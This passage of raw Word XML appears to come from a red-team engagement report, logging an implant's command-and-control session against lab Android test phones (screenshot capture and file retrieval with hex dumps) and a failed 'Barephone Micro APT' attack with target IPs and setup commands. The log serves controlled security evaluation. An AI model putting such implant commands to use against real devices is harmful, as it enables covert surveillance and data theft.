    <w:p w14:paraId="48BFA842" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">n#\n# This file should contain the addresses and aliases for local hosts tha'...'-dp\n' (1643 bytes)                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6CC1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5(hosts) = 59c7e17d2d1c8dbe1d211cda3e84fc1e   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F129BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DAE9EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D7174" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;screenshot                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106641A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00"\x00\x00\x00' (8 bytes)                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B281E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 22 00 00 00                          ...."...                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017EC551" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\xfbx\x01\x00#\x00\x00\x00\x00\x00\x00\x00\xe3x\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776473AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>\x00\x00\x04\x00\x00\x00\x03\x00\x08\x06\x00\x00\x00\xba\xba\x15\r\x00\x01x\xaaIDATx^cd``\xf8\xcf0\nFC`4\x04FC`4\x04FC`4\x04FC`4\x04F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B62649" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C`4\x04FC`4\x04FC`4\x04\x86u\x080\x8d\xc6\xefh\x08\x8c\x86\xc0h\x08\x8c\x86\xc0h'...'\xaeB`\x82' (96507 bytes)                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7A8B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wrote 96483 bytes to screenshot.png        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F76E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC14545" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B6199" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile screenshot.png screenshot.png                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C1C65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: "'\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00screenshot.png\x00" (39 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724A4B85" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 27 00 00 00 04 00 00 00 00 00 00 00 0F 00 00 00  '...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27401ED6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 0F 00 00 00 00 00 00 00 73 63 72 65 65 6E 73 68  ........screensh                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EBB269" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 6F 74 2E 70 6E 67 00                             ot.png.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A28489A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66760958" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>No response?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59516729" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EF62D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AFAEDE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">^Cfinally                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D44F8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending quit                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC599E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x002\x00\x00\x00' (8 bytes)                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06DF3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 32 00 00 00                          ....2...                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785E512" w14:textId="29B544A3" w:rsidR="00CE2C66" w:rsidRPr="0097593C" w:rsidRDefault="006C14C7" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C14C7">
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">closing                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8F55B" w14:textId="761DCDC1" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc12600078"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:14 -- ClearScope ch64 -- Barephone Micro APT (Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="16198073" w14:textId="3A8A11A0" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>In another attempt to get something to work on the ClearScope phones we reran the attack from the previous day after being assured that the phones had been fixed; however, the attack still failed as Micro APT never connected out to C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B616DD4" w14:textId="440F7C49" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_shiskw88ohfc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="146" w:name="_Toc12600079"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="13BF44BF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.114</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD0810" w14:textId="7FCBBD0F" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_njlg3x6qx4h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="148" w:name="_Toc12600080"/>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="0DEB1BE4"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Barephone APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99B7A6"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Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727092A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Failed to connect out for C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F974A07" w14:textId="764C9389" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_c60706lv5hpl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="150" w:name="_Toc12600081"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="79FFCA1A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9464C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install screencap-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ABF61" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195CCA0D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C01816" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F68C2C8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>ADB remote control -&gt; launch TA5 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310554BD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>Click Capture Screenshot button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490A795" w14:textId="23B5D5E3" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_7g5zp4kedate" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="152" w:name="_Toc12600082"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="2C79DF90" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A826862" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>admin@ta51-bg-gen:~/apk$ scp barephone-instr.apk user@128.55.12.54:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB65F8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3CA49" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">barephone-instr.apk                                                                                                                                100%  127KB 127.1KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186441A4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5936F270" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFA5EE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D5CE1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">barephone-instr.apk                                                                                                                                100%  127KB 127.1KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30C6CF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D47A6F9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD8C01" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>admin@ta51-bg-gen:~/apk$ ssh user@128.55.12.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E50CB44" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92E5CB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A865A6A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F475ACB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install barephone-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F72DFC2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>adb: failed to install barephone-instr.apk: Failure [INSTALL_FAILED_VERSION_DOWNGRADE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEF04A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install -r barephone-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355266A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>adb: failed to install barephone-instr.apk: Failure [INSTALL_FAILED_VERSION_DOWNGRADE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFA10E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C242D1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>14:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A36A0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>[user@ta1-clearscope-translate ~]$ adb uninstall com.maxflame.barephone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E64C7" w14:textId="73ADF5DC" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1D45E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc12600083"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="705CD09E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC3FA0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install -r barephone-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1AB46" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07748795" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8208DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439AE6CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Remote control -&gt; barephone launch</w:t>
      </w:r>
    </w:p>
